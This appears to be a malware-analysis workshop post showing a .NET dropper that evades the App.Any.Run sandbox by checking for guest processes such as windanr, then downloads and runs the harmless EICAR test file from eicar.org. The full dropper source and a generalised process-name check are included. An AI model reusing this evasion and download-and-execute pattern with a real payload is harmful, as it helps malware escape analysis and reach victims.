The goal of the research was to create a small dropper that triggers no detection in the popular App.Any.Run sandbox but can still determine whether it is running inside the sandbox or not.
For now, I can't tell if that also affects the Searcher and Hunter versions, but for the free one it works just fine.
This was created for a workshop about malware analysis for one of my clients. It should demonstrate how easily tools like App.Any.Run and other sandbox solutions can be tricked and that they cannot replace human analysts. To be clear: in my opinion the sandbox is very good and I can recommend it as a first analysis step, but it must be understood that even something called "heavy anti evasion" cannot detect everything and can only be seen as an aid for the human analyst.
The following code acts as a .NET dropper that drops the EICAR test file, with the "enhanced functionality" of not getting detected by the App.Any.Run sandbox, even with Heavy Anti-Evasion turned on.
It simply checks for an executable that is always running in the current version of the sandbox guest; nothing advanced and no rocket science at all. Killing the process (qemu-ga.exe) would terminate the connection between the sandbox and the guest OS, but that requires administrative access, so in the sample below we simply quit our program after detecting that the agent is running.
Update: The process qemu-ga.exe was renamed to the static name q.exe. That name is too unspecific to act on directly (a one-letter image name can easily collide with legitimate software), so I changed the source to check for windanr.exe, another static artifact of the App.Any.Run sandbox. Note that Process.GetProcessesByName expects the image name without the ".exe" suffix, which is why the code checks for "windanr" rather than "windanr.exe".
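As an added example (not the original workshop code), here is the same artifact check generalised to all three process names the post mentions, with the process-name comparison factored into a pure function that can be exercised on a constructed list. The namespace, class and method names are my own, and the artifact list is taken from the post rather than from any sandbox documentation:

```csharp
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;

namespace SandboxArtifactCheck   // namespace and names chosen for this example
{
    static class ArtifactCheck
    {
        // Process names the post describes as static App.Any.Run guest artifacts
        // (qemu-ga.exe, its later rename q.exe, and windanr.exe). Both
        // Process.GetProcessesByName and Process.ProcessName use the image name
        // without ".exe", so "windanr.exe" would never match; the list is kept in
        // the bare form and Normalise() strips the suffix defensively.
        public static readonly string[] KnownArtifacts = { "qemu-ga", "q", "windanr" };

        // Returns which artifacts appear in the supplied process names.
        // Pure function: it can be run offline on a constructed list.
        public static IReadOnlyList<string> FindArtifacts(
            IEnumerable<string> runningProcessNames, IEnumerable<string> artifacts)
        {
            var running = new HashSet<string>(
                runningProcessNames.Select(Normalise), StringComparer.OrdinalIgnoreCase);
            return artifacts.Select(Normalise)
                            .Where(running.Contains)
                            .Distinct(StringComparer.OrdinalIgnoreCase)
                            .ToList();
        }

        // Image name as the .NET process APIs report it: trimmed, without ".exe".
        public static string Normalise(string name)
        {
            name = name.Trim();
            return name.EndsWith(".exe", StringComparison.OrdinalIgnoreCase)
                ? name.Substring(0, name.Length - 4)
                : name;
        }

        // Snapshot of every process name visible to the current user. Reading
        // ProcessName needs no elevation; a process that exits between the
        // enumeration and the read throws InvalidOperationException and is skipped.
        public static List<string> RunningProcessNames()
        {
            var names = new List<string>();
            foreach (var p in Process.GetProcesses())
            {
                try { names.Add(p.ProcessName); }
                catch (InvalidOperationException) { }
                finally { p.Dispose(); }
            }
            return names;
        }

        static void Main()
        {
            var hits = FindArtifacts(RunningProcessNames(), KnownArtifacts);
            if (hits.Count > 0)
            {
                // A one-letter name such as "q" is easy to collide with on a real
                // host (the reason the post moved to "windanr"), so a hit on it
                // alone is weaker evidence than a hit on the longer names.
                Console.WriteLine("Sandbox artifact(s) found: " + string.Join(", ", hits));
                Environment.Exit(1);
            }
            Console.WriteLine("No known sandbox artifact found, continuing.");
        }
    }
}
```

With a constructed list such as `new[] { "explorer", "svchost", "windanr.exe" }`, FindArtifacts returns just `windanr`; with `new[] { "explorer", "svchost" }` it returns an empty list. Keeping the comparison separate from the live process enumeration is also what makes the check easy for an analyst to spot and patch out, which is the point the post makes about detection.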
Detecting the evasion is fairly simple. Most malware analysts would probably immediately check why the program quits right after start and patch the check out; more junior analysts, however, might be tricked by this.
Old Sample URL: Initial Sample
New Sample URL: Updated Sample
```csharp
using System;

/// <summary>
/// This code was created for a workshop to show how easy it can be
/// to trick "next generation security" products.
/// It should demonstrate that even a thing called
/// "Heavy anti evasion" is not that heavy.
/// In no way would I say the targeted sandbox is a bad project -
/// I love it! But everyone needs to understand the limitations.
///
/// This is not a tool that provides any illegal information.
/// We do not promote hacking or software cracking.
/// All the information provided on these pages is for educational purposes only.
/// The authors of this tool are not responsible for any misuse of the information.
/// You shall not misuse the information to gain unauthorized access and/or write malicious programs.
/// This information shall only be used to expand knowledge and not for causing malicious or damaging attacks.
/// You may try all of these techniques on your own computer at your own risk.
/// Performing any hack attempts/tests without written permission from the owner of the computer system is illegal.
/// IN NO EVENT SHALL THE CREATORS, OWNER, OR CONTRIBUTORS BE LIABLE FOR
/// ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
/// DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
/// GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
/// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
/// IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
/// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
/// ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
/// </summary>
namespace Heavy_anti_evasion_bypass
{
    class Program
    {
        static void Main(string[] args)
        {
            // Sandbox check: "windanr" is a process that is always running in the
            // App.Any.Run guest. GetProcessesByName takes the image name without
            // the ".exe" suffix. If it is found, quit before doing anything that
            // the sandbox would flag.
            foreach (var process in System.Diagnostics.Process.GetProcessesByName("windanr"))
            {
                Environment.Exit(1);
            }

            // Sandbox check survived: download the EICAR test file and run it.
            string remoteUri = "http://www.eicar.org/download/eicar.com";
            string saveFileName = "eicar.com";
            System.Net.WebClient myWebClient = new System.Net.WebClient();
            myWebClient.DownloadFile(remoteUri, saveFileName);
            System.Diagnostics.Process.Start(saveFileName);
        }
    }
}
```